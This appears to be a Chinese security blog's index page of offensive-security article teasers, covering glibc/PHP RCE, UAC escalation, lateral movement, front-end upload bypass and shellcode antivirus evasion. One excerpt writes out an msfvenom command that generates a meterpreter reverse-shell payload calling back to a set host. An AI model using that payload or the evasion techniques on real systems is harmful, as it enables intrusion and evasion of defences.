网络安全
未读
ICONV,将字符集设置为 RCE:利用 GLIBC 攻击 PHP 引擎
介绍 几个月前,我偶然发现了 glibc(Linux 程序的基础库)中存在一个已有 24 年历史的缓冲区溢出漏洞。尽管在多个知名库或可执行文件中都可以找到该漏洞,但事实证明它很少被利用 — 虽然它没有提供太多的回旋余地,但它需要难以实现的先决条件。寻找目标主要导致失望。然而,在 PHP 上,这个漏洞
网络安全
未读
idc后渗透 ssh 批量命令执行工具
工具已发送github 工具链接地址:https://github.com/lmaqbailan/Wolf-eyed-safety/releases/tag/ssh 文章链接地址:https://github.com/lmaqbailan/Wolf-eyed-safety/tree/ssh 介绍:
网络安全
未读
Windows 上的 Unicode 到 ASCII 转换可能导致参数注入等
我是 DEVCORE 研究团队的 splitline。我们最近在 cURL 上发现了一个漏洞。我们在最新版本的 cURL(curl-8.8.0_1)中重现了这些问题,并想向您报告。请查看附件文档了解详细信息。 此通告符合我们的漏洞披露政策,该政策将在 90 天后公开披露。我们的目标是确保漏洞能够及时
网络安全
未读
GrimResource - 用于初始访问和规避的 Microsoft 管理控制台
概述 在微软默认禁用互联网文档的 Office 宏后,JavaScript、MSI 文件、LNK 对象和 ISO 等其他感染媒介的流行度激增。然而,这些其他技术受到防御者的严格审查,被发现的可能性很高。成熟的攻击者试图利用新的和未公开的感染媒介来获取访问权限,同时逃避防御。最近的一个例子是朝鲜参与者
网络安全
未读
应对隐秘的 WMI 横向移动
介绍 在本文中,我们将介绍一个使用 Windows 管理规范 (WMI) 远程控制目标计算机的 Python 脚本。该脚本利用 COM 与 WMI 基础架构进行通信并执行管理任务。 使用不同的类,我们将探索执行 shell 命令的不同方法,并观察每种方法在后台的工作方式以及它们在事件查看器中的
网络安全
未读
云横向移动:通过易受攻击的容器进行入侵
横向移动是云安全日益令人担忧的问题。也就是说,一旦您的云基础设施的一部分受到威胁,攻击者可以攻击多远? 在针对云环境的著名攻击中,经常发生的情况是,一个公开可用的易受攻击的应用程序可以作为入口点。从那里,攻击者可以尝试进入云环境,试图窃取敏感数据或使用该帐户来达到自己的目的,例如加密货币挖掘。 在本
网络安全
未读
PHP安全介绍-JS前端逻辑类
JS前端验证-文件上传 自写一个js语言的文件上传功能 访问网站上传一个php文件发现有js前端白名单验证不允许上传 因为js代码是在浏览器运行的,所以可以在浏览器禁用js运行。js验证代码无法执行,就可以上传任意文件了 禁用js 火狐浏览器搜索about:config 进入页面再次搜索javasc
网络安全
未读
权限提升-Windows提权-UAC提权之MSF模块和UACME项目+DLL劫持+不带引号服务路径+不安全的服务权限
权限提升基础信息 1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入
网络安全
未读
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
C/C++ --ShellCode-免杀对抗 介绍: shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。
网络安全
未读
免杀对抗-C+go语言-混淆+防反编译+分离
C#&NET-ShellCode-生成/上线 一、生成: 1.msf生成C#语言的shellcode 命令:msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.206.192 LPORT=4444 -e x86/shikata_g
CTF
未读
Python3 图片隐写术的实现
前言 原本的实现程序只能处理 png 格式的图片,笔者考虑添加对 jpg 格式的支持;经过一段时间的尝试,最后发现因为此方案是基于 Pillow 模块实现对图片文件的处理,而 Pillow 模块在保存 jpg 格式图片时默认会将色彩信息的最后一位去除,为有损压缩,故加密信息会在最后的保存步骤中被抹去
网络安全
未读
免杀对抗-无文件落地和分离拆分-文本提取+加载器分离+参数协议化+图片隐写
无文件落地&分离拆分 无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和